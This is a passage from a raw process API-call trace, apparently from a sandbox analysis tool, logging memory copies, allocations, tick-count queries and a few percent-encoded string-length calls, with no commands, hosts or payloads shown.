_Size=0x2 | out: _Dst=0x24adf9a5d7a) returned 0x24adf9a5d7a [0100.288] memcpy (in: _Dst=0x24adf9a5d76, _Src=0x24adf9b94e8, _Size=0x4 | out: _Dst=0x24adf9a5d76) returned 0x24adf9a5d76 [0100.288] memcpy (in: _Dst=0x24adf9a5d74, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5d74) returned 0x24adf9a5d74 [0100.288] memcpy (in: _Dst=0x24adf9a5d70, _Src=0x24adf9b9868, _Size=0x4 | out: _Dst=0x24adf9a5d70) returned 0x24adf9a5d70 [0100.288] memcpy (in: _Dst=0x24adf9a5d6e, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5d6e) returned 0x24adf9a5d6e [0100.288] memcpy (in: _Dst=0x24adf9a5d6a, _Src=0x24adf9b9568, _Size=0x4 | out: _Dst=0x24adf9a5d6a) returned 0x24adf9a5d6a [0100.288] memcpy (in: _Dst=0x24adf9a5d68, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5d68) returned 0x24adf9a5d68 [0100.288] free (_Block=0x24ae148add0) [0100.288] SysStringLen (param_1="%55%6e%77%69") returned 0xc [0100.289] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae1483ab0 [0100.289] memcpy (in: _Dst=0x24adf9b9ff8, _Src=0x24ae1483ab0, _Size=0x8 | out: _Dst=0x24adf9b9ff8) returned 0x24adf9b9ff8 [0100.289] free (_Block=0x24ae1483ab0) [0100.290] malloc (_Size=0x408) returned 0x24ae148c700 [0100.290] memcpy (in: _Dst=0x24adf9b9708, _Src=0xd6788fbb30, _Size=0x2 | out: _Dst=0x24adf9b9708) returned 0x24adf9b9708 [0100.290] malloc (_Size=0x28) returned 0x24ae148add0 [0100.290] memcpy (in: _Dst=0x24adf9b9dea, _Src=0x24ae1a0f684, _Size=0xc | out: _Dst=0x24adf9b9dea) returned 0x24adf9b9dea [0100.290] memcpy (in: _Dst=0x24adf9b9de8, _Src=0x24adf9b9708, _Size=0x2 | out: _Dst=0x24adf9b9de8) returned 0x24adf9b9de8 [0100.291] free (_Block=0x24ae148add0) [0100.291] malloc (_Size=0x70) returned 0x24ae14702a0 [0100.292] malloc (_Size=0x28) returned 0x24ae148aef0 [0100.292] malloc (_Size=0x28) returned 0x24ae148add0 [0100.292] malloc (_Size=0x28) returned 0x24ae148b280 [0100.293] malloc (_Size=0x28) returned 0x24ae148ae00 [0100.293] malloc (_Size=0x28) returned 0x24ae148ab90 [0100.293] memcpy (in: _Dst=0x24adf9b9d32, _Src=0x24adf9b9b68, _Size=0x2 | out: _Dst=0x24adf9b9d32) returned 0x24adf9b9d32 [0100.293] memcpy (in: _Dst=0x24adf9b9d30, _Src=0x24adf9b95a8, _Size=0x2 | out: _Dst=0x24adf9b9d30) returned 0x24adf9b9d30 [0100.293] memcpy (in: _Dst=0x24adf9b9d2e, _Src=0x24adf9b98e8, _Size=0x2 | out: _Dst=0x24adf9b9d2e) returned 0x24adf9b9d2e [0100.293] memcpy (in: _Dst=0x24adf9b9d2c, _Src=0x24adf9b9428, _Size=0x2 | out: _Dst=0x24adf9b9d2c) returned 0x24adf9b9d2c [0100.293] memcpy (in: _Dst=0x24adf9b9d2a, _Src=0x24adf9b98c8, _Size=0x2 | out: _Dst=0x24adf9b9d2a) returned 0x24adf9b9d2a [0100.293] memcpy (in: _Dst=0x24adf9b9d28, _Src=0x24adf9b9688, _Size=0x2 | out: _Dst=0x24adf9b9d28) returned 0x24adf9b9d28 [0100.293] free (_Block=0x24ae148ab90) [0100.294] memcpy (in: _Dst=0x24adf9b9448, _Src=0xd6788f9a50, _Size=0x4 | out: _Dst=0x24adf9b9448) returned 0x24adf9b9448 [0100.294] malloc (_Size=0x28) returned 0x24ae148b310 [0100.294] memcpy (in: _Dst=0x24adf9ba35c, _Src=0x24adf9b9448, _Size=0x4 | out: _Dst=0x24adf9ba35c) returned 0x24adf9ba35c [0100.294] memcpy (in: _Dst=0x24adf9ba358, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9ba358) returned 0x24adf9ba358 [0100.294] free (_Block=0x24ae148b310) [0100.294] memcpy (in: _Dst=0x24adf9b9968, _Src=0x24adf9ba35c, _Size=0x4 | out: _Dst=0x24adf9b9968) returned 0x24adf9b9968 [0100.294] malloc (_Size=0x28) returned 0x24ae148af80 [0100.294] memcpy (in: _Dst=0x24adf9b9b28, _Src=0xd6788f9a50, _Size=0x4 | out: _Dst=0x24adf9b9b28) returned 0x24adf9b9b28 [0100.294] malloc (_Size=0x28) returned 0x24ae148b2e0 [0100.294] memcpy (in: _Dst=0x24adf9b9e4c, _Src=0x24adf9b9b28, _Size=0x4 | out: _Dst=0x24adf9b9e4c) returned 0x24adf9b9e4c [0100.294] memcpy (in: _Dst=0x24adf9b9e48, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9b9e48) returned 0x24adf9b9e48 [0100.295] free (_Block=0x24ae148b2e0) [0100.295] memcpy (in: _Dst=0x24adf9b9728, _Src=0x24adf9b9e4c, _Size=0x4 | out: _Dst=0x24adf9b9728) returned 0x24adf9b9728 [0100.295] malloc (_Size=0x28) returned 0x24ae148b2e0 [0100.295] malloc (_Size=0x28) returned 0x24ae148b310 [0100.295] GetTickCount () returned 0x210d113 [0100.295] memcpy (in: _Dst=0x24adf9b9928, _Src=0xd6788f9a50, _Size=0x4 | out: _Dst=0x24adf9b9928) returned 0x24adf9b9928 [0100.295] memcpy (in: _Dst=0x24adf9b9c3c, _Src=0x24adf9b9928, _Size=0x4 | out: _Dst=0x24adf9b9c3c) returned 0x24adf9b9c3c [0100.295] memcpy (in: _Dst=0x24adf9b9c38, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9b9c38) returned 0x24adf9b9c38 [0100.295] free (_Block=0x24ae148ab90) [0100.296] memcpy (in: _Dst=0x24adf9b95c8, _Src=0x24adf9b9c3c, _Size=0x4 | out: _Dst=0x24adf9b95c8) returned 0x24adf9b95c8 [0100.296] memcpy (in: _Dst=0x24adf9b9948, _Src=0xd6788f9a50, _Size=0x4 | out: _Dst=0x24adf9b9948) returned 0x24adf9b9948 [0100.296] memcpy (in: _Dst=0x24adf9b9e1c, _Src=0x24adf9b9948, _Size=0x4 | out: _Dst=0x24adf9b9e1c) returned 0x24adf9b9e1c [0100.296] memcpy (in: _Dst=0x24adf9b9e18, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9b9e18) returned 0x24adf9b9e18 [0100.296] free (_Block=0x24ae148ae30) [0100.296] memcpy (in: _Dst=0x24adf9b99e8, _Src=0x24adf9b9e1c, _Size=0x4 | out: _Dst=0x24adf9b99e8) returned 0x24adf9b99e8 [0100.296] memcpy (in: _Dst=0x24adf9b95e8, _Src=0xd6788f9a50, _Size=0x4 | out: _Dst=0x24adf9b95e8) returned 0x24adf9b95e8 [0100.296] memcpy (in: _Dst=0x24adf9ba08c, _Src=0x24adf9b95e8, _Size=0x4 | out: _Dst=0x24adf9ba08c) returned 0x24adf9ba08c [0100.296] memcpy (in: _Dst=0x24adf9ba088, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9ba088) returned 0x24adf9ba088 [0100.296] free (_Block=0x24ae1394d00) [0100.296] memcpy (in: _Dst=0x24adf9b9a68, _Src=0x24adf9ba08c, _Size=0x4 | out: _Dst=0x24adf9b9a68) returned 0x24adf9b9a68 [0100.296] memcpy (in: _Dst=0x24adf9b9748, _Src=0xd6788f9a50, _Size=0x4 | out: _Dst=0x24adf9b9748) returned 0x24adf9b9748 [0100.297] memcpy (in: _Dst=0x24adf9ba11c, _Src=0x24adf9b9748, _Size=0x4 | out: _Dst=0x24adf9ba11c) returned 0x24adf9ba11c [0100.297] memcpy (in: _Dst=0x24adf9ba118, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9ba118) returned 0x24adf9ba118 [0100.297] free (_Block=0x24ae1394bb0) [0100.297] memcpy (in: _Dst=0x24adf9b9488, _Src=0x24adf9ba11c, _Size=0x4 | out: _Dst=0x24adf9b9488) returned 0x24adf9b9488 [0100.297] memcpy (in: _Dst=0x24adf9a5dc8, _Src=0x24adf9b9488, _Size=0x4 | out: _Dst=0x24adf9a5dc8) returned 0x24adf9a5dc8 [0100.297] memcpy (in: _Dst=0x24adf9a5dc6, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5dc6) returned 0x24adf9a5dc6 [0100.297] memcpy (in: _Dst=0x24adf9a5dc2, _Src=0x24adf9b9a68, _Size=0x4 | out: _Dst=0x24adf9a5dc2) returned 0x24adf9a5dc2 [0100.297] memcpy (in: _Dst=0x24adf9a5dc0, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5dc0) returned 0x24adf9a5dc0 [0100.297] memcpy (in: _Dst=0x24adf9a5dbc, _Src=0x24adf9b99e8, _Size=0x4 | out: _Dst=0x24adf9a5dbc) returned 0x24adf9a5dbc [0100.297] memcpy (in: _Dst=0x24adf9a5dba, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5dba) returned 0x24adf9a5dba [0100.297] memcpy (in: _Dst=0x24adf9a5db6, _Src=0x24adf9b95c8, _Size=0x4 | out: _Dst=0x24adf9a5db6) returned 0x24adf9a5db6 [0100.298] memcpy (in: _Dst=0x24adf9a5db4, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5db4) returned 0x24adf9a5db4 [0100.298] memcpy (in: _Dst=0x24adf9a5db0, _Src=0x24adf9b9728, _Size=0x4 | out: _Dst=0x24adf9a5db0) returned 0x24adf9a5db0 [0100.298] memcpy (in: _Dst=0x24adf9a5dae, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5dae) returned 0x24adf9a5dae [0100.298] memcpy (in: _Dst=0x24adf9a5daa, _Src=0x24adf9b9968, _Size=0x4 | out: _Dst=0x24adf9a5daa) returned 0x24adf9a5daa [0100.298] memcpy (in: _Dst=0x24adf9a5da8, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5da8) returned 0x24adf9a5da8 [0100.298] free (_Block=0x24ae13947c0) [0100.298] SysStringLen (param_1="%c2%91%c3%b0%49%59") returned 0x12 [0100.298] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae148cb10 [0100.299] memcpy (in: _Dst=0x24adf9ba2c8, _Src=0x24ae148cb10, _Size=0x8 | out: _Dst=0x24adf9ba2c8) returned 0x24adf9ba2c8 [0100.299] free (_Block=0x24ae148cb10) [0100.303] memcpy (in: _Dst=0x24adf9b9e7e, _Src=0x24adf9b99c8, _Size=0x2 | out: _Dst=0x24adf9b9e7e) returned 0x24adf9b9e7e [0100.303] memcpy (in: _Dst=0x24adf9b9e7c, _Src=0x24adf9b94a8, _Size=0x2 | out: _Dst=0x24adf9b9e7c) returned 0x24adf9b9e7c [0100.303] memcpy (in: _Dst=0x24adf9b9e7a, _Src=0x24adf9b99a8, _Size=0x2 | out: _Dst=0x24adf9b9e7a) returned 0x24adf9b9e7a [0100.303] memcpy (in: _Dst=0x24adf9b9e78, _Src=0x24adf9b9628, _Size=0x2 | out: _Dst=0x24adf9b9e78) returned 0x24adf9b9e78 [0100.303] free (_Block=0x24ae1394af0) [0100.304] memcpy (in: _Dst=0x24adf9b9a08, _Src=0xd6788fbb30, _Size=0x4 | out: _Dst=0x24adf9b9a08) returned 0x24adf9b9a08 [0100.304] memcpy (in: _Dst=0x24adf9b9eac, _Src=0x24ae1a0f684, _Size=0xc | out: _Dst=0x24adf9b9eac) returned 0x24adf9b9eac [0100.304] memcpy (in: _Dst=0x24adf9b9ea8, _Src=0x24adf9b9a08, _Size=0x4 | out: _Dst=0x24adf9b9ea8) returned 0x24adf9b9ea8 [0100.304] free (_Block=0x24ae1394af0) [0100.304] GetTickCount () returned 0x210d122 [0100.304] GetTickCount () returned 0x210d122 [0100.304] GetTickCount () returned 0x210d122 [0100.305] memcpy (in: _Dst=0x24adf9b9f3e, _Src=0x24adf9ba808, _Size=0x2 | out: _Dst=0x24adf9b9f3e) returned 0x24adf9b9f3e [0100.305] memcpy (in: _Dst=0x24adf9b9f3c, _Src=0x24adf9b9a48, _Size=0x2 | out: _Dst=0x24adf9b9f3c) returned 0x24adf9b9f3c [0100.305] memcpy (in: _Dst=0x24adf9b9f3a, _Src=0x24adf9b9ae8, _Size=0x2 | out: _Dst=0x24adf9b9f3a) returned 0x24adf9b9f3a [0100.305] memcpy (in: _Dst=0x24adf9b9f38, _Src=0x24adf9b97a8, _Size=0x2 | out: _Dst=0x24adf9b9f38) returned 0x24adf9b9f38 [0100.305] free (_Block=0x24ae1394c10) [0100.305] GetTickCount () returned 0x210d122 [0100.305] GetTickCount () returned 0x210d122 [0100.305] GetTickCount () returned 0x210d122 [0100.305] GetTickCount () returned 0x210d122 [0100.305] GetTickCount () returned 0x210d122 [0100.306] memcpy (in: _Dst=0x24adf9ba468, _Src=0xd6788f9a50, _Size=0x4 | out: _Dst=0x24adf9ba468) returned 0x24adf9ba468 [0100.306] malloc (_Size=0x28) returned 0x24ae1394b20 [0100.306] GetTickCount () returned 0x210d122 [0100.306] memcpy (in: _Dst=0x24adf9b9cfc, _Src=0x24adf9ba468, _Size=0x4 | out: _Dst=0x24adf9b9cfc) returned 0x24adf9b9cfc [0100.306] memcpy (in: _Dst=0x24adf9b9cf8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9b9cf8) returned 0x24adf9b9cf8 [0100.307] free (_Block=0x24ae1394b20) [0100.307] GetTickCount () returned 0x210d122 [0100.307] memcpy (in: _Dst=0x24adf9ba548, _Src=0x24adf9b9cfc, _Size=0x4 | out: _Dst=0x24adf9ba548) returned 0x24adf9ba548 [0100.307] malloc (_Size=0x28) returned 0x24ae1394820 [0100.307] GetTickCount () returned 0x210d122 [0100.307] GetTickCount () returned 0x210d122 [0100.307] GetTickCount () returned 0x210d122 [0100.307] GetTickCount () returned 0x210d122 [0100.308] GetTickCount () returned 0x210d122 [0100.308] memcpy (in: _Dst=0x24adf9ba4c8, _Src=0xd6788f9a50, _Size=0x4 | out: _Dst=0x24adf9ba4c8) returned 0x24adf9ba4c8 [0100.308] malloc (_Size=0x28) returned 0x24ae1394880 [0100.308] GetTickCount () returned 0x210d122 [0100.308] memcpy (in: _Dst=0x24adf9b9c6c, _Src=0x24adf9ba4c8, _Size=0x4 | out: _Dst=0x24adf9b9c6c) returned 0x24adf9b9c6c [0100.308] memcpy (in: _Dst=0x24adf9b9c68, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9b9c68) returned 0x24adf9b9c68 [0100.308] free (_Block=0x24ae1394880) [0100.309] GetTickCount () returned 0x210d122 [0100.309] memcpy (in: _Dst=0x24adf9ba628, _Src=0x24adf9b9c6c, _Size=0x4 | out: _Dst=0x24adf9ba628) returned 0x24adf9ba628 [0100.309] malloc (_Size=0x28) returned 0x24ae1394c10 [0100.309] GetTickCount () returned 0x210d122 [0100.309] malloc (_Size=0x28) returned 0x24ae1394b20 [0100.309] GetTickCount () returned 0x210d122 [0100.309] GetTickCount () returned 0x210d122 [0100.309] GetTickCount () returned 0x210d122 [0100.310] GetTickCount () returned 0x210d122 [0100.310] GetTickCount () returned 0x210d122 [0100.310] memcpy (in: _Dst=0x24adf9baa48, _Src=0xd6788f9a50, _Size=0x4 | out: _Dst=0x24adf9baa48) returned 0x24adf9baa48 [0100.310] malloc (_Size=0x28) returned 0x24ae1394ca0 [0100.310] GetTickCount () returned 0x210d122 [0100.311] memcpy (in: _Dst=0x24adf9b9edc, _Src=0x24adf9baa48, _Size=0x4 | out: _Dst=0x24adf9b9edc) returned 0x24adf9b9edc [0100.311] memcpy (in: _Dst=0x24adf9b9ed8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9b9ed8) returned 0x24adf9b9ed8 [0100.311] free (_Block=0x24ae1394ca0) [0100.311] GetTickCount () returned 0x210d122 [0100.312] memcpy (in: _Dst=0x24adf9ba848, _Src=0x24adf9b9edc, _Size=0x4 | out: _Dst=0x24adf9ba848) returned 0x24adf9ba848 [0100.312] malloc (_Size=0x28) returned 0x24ae1394be0 [0100.312] GetTickCount () returned 0x210d122 [0100.312] malloc (_Size=0x28) returned 0x24ae1394a30 [0100.312] GetTickCount () returned 0x210d122 [0100.312] GetTickCount () returned 0x210d122 [0100.312] GetTickCount () returned 0x210d122 [0100.312] GetTickCount () returned 0x210d122 [0100.313] GetTickCount () returned 0x210d122 [0100.313] memcpy (in: _Dst=0x24adf9ba648, _Src=0xd6788f9a50, _Size=0x4 | out: _Dst=0x24adf9ba648) returned 0x24adf9ba648 [0100.313] malloc (_Size=0x28) returned 0x24ae1394c40 [0100.313] GetTickCount () returned 0x210d122 [0100.313] memcpy (in: _Dst=0x24adf9ba29c, _Src=0x24adf9ba648, _Size=0x4 | out: _Dst=0x24adf9ba29c) returned 0x24adf9ba29c [0100.313] memcpy (in: _Dst=0x24adf9ba298, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9ba298) returned 0x24adf9ba298 [0100.314] free (_Block=0x24ae1394c40) [0100.314] GetTickCount () returned 0x210d122 [0100.314] memcpy (in: _Dst=0x24adf9ba568, _Src=0x24adf9ba29c, _Size=0x4 | out: _Dst=0x24adf9ba568) returned 0x24adf9ba568 [0100.314] malloc (_Size=0x28) returned 0x24ae1394b80 [0100.314] GetTickCount () returned 0x210d122 [0100.314] malloc (_Size=0x28) returned 0x24ae1394bb0 [0100.315] GetTickCount () returned 0x210d122 [0100.317] memcpy (in: _Dst=0x24adf9a587c, _Src=0x24adf9ba568, _Size=0x4 | out: _Dst=0x24adf9a587c) returned 0x24adf9a587c [0100.317] memcpy (in: _Dst=0x24adf9a587a, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a587a) returned 0x24adf9a587a [0100.317] memcpy (in: _Dst=0x24adf9a5876, _Src=0x24adf9ba848, _Size=0x4 | out: _Dst=0x24adf9a5876) returned 0x24adf9a5876 [0100.317] memcpy (in: _Dst=0x24adf9a5874, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5874) returned 0x24adf9a5874 [0100.317] memcpy (in: _Dst=0x24adf9a5870, _Src=0x24adf9ba628, _Size=0x4 | out: _Dst=0x24adf9a5870) returned 0x24adf9a5870 [0100.317] memcpy (in: _Dst=0x24adf9a586e, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a586e) returned 0x24adf9a586e [0100.317] memcpy (in: _Dst=0x24adf9a586a, _Src=0x24adf9ba548, _Size=0x4 | out: _Dst=0x24adf9a586a) returned 0x24adf9a586a [0100.318] memcpy (in: _Dst=0x24adf9a5868, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5868) returned 0x24adf9a5868 [0100.318] free (_Block=0x24ae1394bb0) [0100.318] SysStringLen (param_1="%63%68%61%72") returned 0xc [0100.318] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae148cb10 [0100.319] GetTickCount () returned 0x210d132 [0100.319] memcpy (in: _Dst=0x24adf9ba388, _Src=0x24ae148cb10, _Size=0x8 | out: _Dst=0x24adf9ba388) returned 0x24adf9ba388 [0100.319] free (_Block=0x24ae148cb10) [0100.319] malloc (_Size=0x2e0) returned 0x24ae1395cc0 [0100.319] GetTickCount () returned 0x210d132 [0100.319] malloc (_Size=0x20) returned 0x24ae13947f0 [0100.319] malloc (_Size=0x288) returned 0x24ae148ed20 [0100.319] realloc (_Block=0x0, _Size=0x140) returned 0x24ae139d240 [0100.320] GetTickCount () returned 0x210d132 [0100.320] realloc (_Block=0x24ae13947f0, _Size=0x40) returned 0x24ae1485a80 [0100.320] realloc (_Block=0x24ae139d240, _Size=0x280) returned 0x24ae1396be0 [0100.320] malloc (_Size=0x508) returned 0x24ae1396e70 [0100.320] GetTickCount () returned 0x210d132 [0100.320] realloc (_Block=0x24ae1485a80, _Size=0x80) returned 0x24ae1485a80 [0100.320] GetTickCount () returned 0x210d132 [0100.320] realloc (_Block=0x24ae1396be0, _Size=0x500) returned 0x24ae139d630 [0100.320] GetTickCount () returned 0x210d132 [0100.320] malloc (_Size=0xa08) returned 0x24ae139db40 [0100.320] GetTickCount () returned 0x210d132 [0100.321] realloc (_Block=0x24ae1485a80, _Size=0x100) returned 0x24ae1395fb0 [0100.321] GetTickCount () returned 0x210d132 [0100.321] GetTickCount () returned 0x210d132 [0100.321] realloc (_Block=0x24ae139d630, _Size=0xa00) returned 0x24ae139e550 [0100.321] GetTickCount () returned 0x210d132 [0100.321] GetTickCount () returned 0x210d132 [0100.321] GetTickCount () returned 0x210d132 [0100.321] malloc (_Size=0x1408) returned 0x24ae139ef60 [0100.321] GetTickCount () returned 0x210d132 [0100.321] realloc (_Block=0x24ae1395fb0, _Size=0x200) returned 0x24ae1395fb0 [0100.322] GetTickCount () returned 0x210d132 [0100.322] GetTickCount () returned 0x210d132 [0100.322] GetTickCount () returned 0x210d132 [0100.322] realloc (_Block=0x24ae139e550, _Size=0x1400) returned 0x24ae13a0370 [0100.322] GetTickCount () returned 0x210d132 [0100.322] GetTickCount () returned 0x210d132 [0100.322] GetTickCount () returned 0x210d132 [0100.322] GetTickCount () returned 0x210d132 [0100.322] GetTickCount () returned 0x210d132 [0100.322] GetTickCount () returned 0x210d132 [0100.322] GetTickCount () returned 0x210d132 [0100.322] GetTickCount () returned 0x210d132 [0100.322] malloc (_Size=0x2808) returned 0x24ae13a1780 [0100.323] GetTickCount () returned 0x210d132 [0100.325] GetTickCount () returned 0x210d132 [0100.327] GetTickCount () returned 0x210d132 [0100.329] GetTickCount () returned 0x210d132 [0100.333] GetTickCount () returned 0x210d142 [0100.335] GetTickCount () returned 0x210d142 [0100.336] GetTickCount () returned 0x210d142 [0100.338] GetTickCount () returned 0x210d142 [0100.340] GetTickCount () returned 0x210d142 [0100.341] GetTickCount () returned 0x210d142 [0100.343] GetTickCount () returned 0x210d142 [0100.345] GetTickCount () returned 0x210d142 [0100.347] GetTickCount () returned 0x210d151 [0100.348] malloc (_Size=0x28) returned 0x24ae1394970 [0100.348] GetTickCount () returned 0x210d151 [0100.348] malloc (_Size=0x28) returned 0x24ae13946a0 [0100.348] GetTickCount () returned 0x210d151 [0100.348] malloc (_Size=0x28) returned 0x24ae13948b0 [0100.348] GetTickCount () returned 0x210d151 [0100.349] memcpy (in: _Dst=0x24adf9ba14e, _Src=0x24adf9ba708, _Size=0x2 | out: _Dst=0x24adf9ba14e) returned 0x24adf9ba14e [0100.349] memcpy (in: _Dst=0x24adf9ba14c, _Src=0x24adf9ba6c8, _Size=0x2 | out: _Dst=0x24adf9ba14c) returned 0x24adf9ba14c [0100.349] memcpy (in: _Dst=0x24adf9ba14a, _Src=0x24adf9ba908, _Size=0x2 | out: _Dst=0x24adf9ba14a) returned 0x24adf9ba14a [0100.349] memcpy (in: _Dst=0x24adf9ba148, _Src=0x24adf9ba6e8, _Size=0x2 | out: _Dst=0x24adf9ba148) returned 0x24adf9ba148 [0100.350] free (_Block=0x24ae13948b0) [0100.350] GetTickCount () returned 0x210d151 [0100.350] memcpy (in: _Dst=0x24adf9ba9e8, _Src=0xd6788fbb30, _Size=0x6 | out: _Dst=0x24adf9ba9e8) returned 0x24adf9ba9e8 [0100.350] malloc (_Size=0x28) returned 0x24ae1394bb0 [0100.350] GetTickCount () returned 0x210d151 [0100.350] memcpy (in: _Dst=0x24adf9ba0be, _Src=0x24ae1a0f684, _Size=0xc | out: _Dst=0x24adf9ba0be) returned 0x24adf9ba0be [0100.350] memcpy (in: _Dst=0x24adf9ba0b8, _Src=0x24adf9ba9e8, _Size=0x6 | out: _Dst=0x24adf9ba0b8) returned 0x24adf9ba0b8 [0100.351] free (_Block=0x24ae1394bb0) [0100.351] GetTickCount () returned 0x210d151 [0100.351] GetTickCount () returned 0x210d151 [0100.351] GetTickCount () returned 0x210d151 [0100.351] malloc (_Size=0x28) returned 0x24ae1394ca0 [0100.351] GetTickCount () returned 0x210d151 [0100.352] malloc (_Size=0x28) returned 0x24ae1394a60 [0100.352] GetTickCount () returned 0x210d151 [0100.352] malloc (_Size=0x28) returned 0x24ae1394d00 [0100.352] GetTickCount () returned 0x210d151 [0100.352] malloc (_Size=0x28) returned 0x24ae1394d30 [0100.352] GetTickCount () returned 0x210d151 [0100.352] malloc (_Size=0x28) returned 0x24ae1394df0 [0100.352] GetTickCount () returned 0x210d151 [0100.353] memcpy (in: _Dst=0x24adf9b9d62, _Src=0x24adf9bab28, _Size=0x2 | out: _Dst=0x24adf9b9d62) returned 0x24adf9b9d62 [0100.353] memcpy (in: _Dst=0x24adf9b9d60, _Src=0x24adf9ba7c8, _Size=0x2 | out: _Dst=0x24adf9b9d60) returned 0x24adf9b9d60 [0100.353] memcpy (in: _Dst=0x24adf9b9d5e, _Src=0x24adf9bab68, _Size=0x2 | out: _Dst=0x24adf9b9d5e) returned 0x24adf9b9d5e [0100.353] memcpy (in: _Dst=0x24adf9b9d5c, _Src=0x24adf9ba728, _Size=0x2 | out: _Dst=0x24adf9b9d5c) returned 0x24adf9b9d5c [0100.353] memcpy (in: _Dst=0x24adf9b9d5a, _Src=0x24adf9ba8e8, _Size=0x2 | out: _Dst=0x24adf9b9d5a) returned 0x24adf9b9d5a [0100.353] memcpy (in: _Dst=0x24adf9b9d58, _Src=0x24adf9ba668, _Size=0x2 | out: _Dst=0x24adf9b9d58) returned 0x24adf9b9d58 [0100.354] free (_Block=0x24ae1394df0) [0100.354] malloc (_Size=0x970) returned 0x24ae139e550 [0100.354] memcpy (in: _Dst=0x24adf9bab48, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9bab48) returned 0x24adf9bab48 [0100.354] malloc (_Size=0x28) returned 0x24ae1394730 [0100.354] GetTickCount () returned 0x210d151 [0100.354] memcpy (in: _Dst=0x24adf9b9f9c, _Src=0x24adf9bab48, _Size=0x4 | out: _Dst=0x24adf9b9f9c) returned 0x24adf9b9f9c [0100.354] memcpy (in: _Dst=0x24adf9b9f98, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9b9f98) returned 0x24adf9b9f98 [0100.355] free (_Block=0x24ae1394730) [0100.355] GetTickCount () returned 0x210d151 [0100.355] memcpy (in: _Dst=0x24adf9ba488, _Src=0x24adf9b9f9c, _Size=0x4 | out: _Dst=0x24adf9ba488) returned 0x24adf9ba488 [0100.355] malloc (_Size=0x28) returned 0x24ae1394bb0 [0100.355] GetTickCount () returned 0x210d151 [0100.355] GetTickCount () returned 0x210d151 [0100.355] GetTickCount () returned 0x210d151 [0100.355] memcpy (in: _Dst=0x24adf9ba748, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9ba748) returned 0x24adf9ba748 [0100.355] malloc (_Size=0x28) returned 0x24ae1394a90 [0100.355] GetTickCount () returned 0x210d151 [0100.355] memcpy (in: _Dst=0x24adf9b9f0c, _Src=0x24adf9ba748, _Size=0x4 | out: _Dst=0x24adf9b9f0c) returned 0x24adf9b9f0c [0100.355] memcpy (in: _Dst=0x24adf9b9f08, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9b9f08) returned 0x24adf9b9f08 [0100.356] free (_Block=0x24ae1394a90) [0100.356] GetTickCount () returned 0x210d151 [0100.356] memcpy (in: _Dst=0x24adf9ba5e8, _Src=0x24adf9b9f0c, _Size=0x4 | out: _Dst=0x24adf9ba5e8) returned 0x24adf9ba5e8 [0100.356] malloc (_Size=0x28) returned 0x24ae13946d0 [0100.356] GetTickCount () returned 0x210d151 [0100.356] malloc (_Size=0x28) returned 0x24ae1394730 [0100.356] GetTickCount () returned 0x210d151 [0100.356] GetTickCount () returned 0x210d151 [0100.356] GetTickCount () returned 0x210d151 [0100.356] memcpy (in: _Dst=0x24adf9ba8a8, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9ba8a8) returned 0x24adf9ba8a8 [0100.356] malloc (_Size=0x28) returned 0x24ae1394c40 [0100.356] GetTickCount () returned 0x210d151 [0100.356] memcpy (in: _Dst=0x24adf9b9ccc, _Src=0x24adf9ba8a8, _Size=0x4 | out: _Dst=0x24adf9b9ccc) returned 0x24adf9b9ccc [0100.356] memcpy (in: _Dst=0x24adf9b9cc8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9b9cc8) returned 0x24adf9b9cc8 [0100.357] free (_Block=0x24ae1394c40) [0100.357] GetTickCount () returned 0x210d151 [0100.357] memcpy (in: _Dst=0x24adf9baba8, _Src=0x24adf9b9ccc, _Size=0x4 | out: _Dst=0x24adf9baba8) returned 0x24adf9baba8 [0100.357] malloc (_Size=0x28) returned 0x24ae1394dc0 [0100.357] GetTickCount () returned 0x210d151 [0100.357] malloc (_Size=0x28) returned 0x24ae1394760 [0100.357] GetTickCount () returned 0x210d151 [0100.357] GetTickCount () returned 0x210d151 [0100.357] GetTickCount () returned 0x210d151 [0100.357] memcpy (in: _Dst=0x24adf9babc8, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9babc8) returned 0x24adf9babc8 [0100.357] malloc (_Size=0x28) returned 0x24ae1394a90 [0100.357] GetTickCount () returned 0x210d151 [0100.358] memcpy (in: _Dst=0x24adf9ba2fc, _Src=0x24adf9babc8, _Size=0x4 | out: _Dst=0x24adf9ba2fc) returned 0x24adf9ba2fc [0100.358] memcpy (in: _Dst=0x24adf9ba2f8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9ba2f8) returned 0x24adf9ba2f8 [0100.358] free (_Block=0x24ae1394a90) [0100.358] 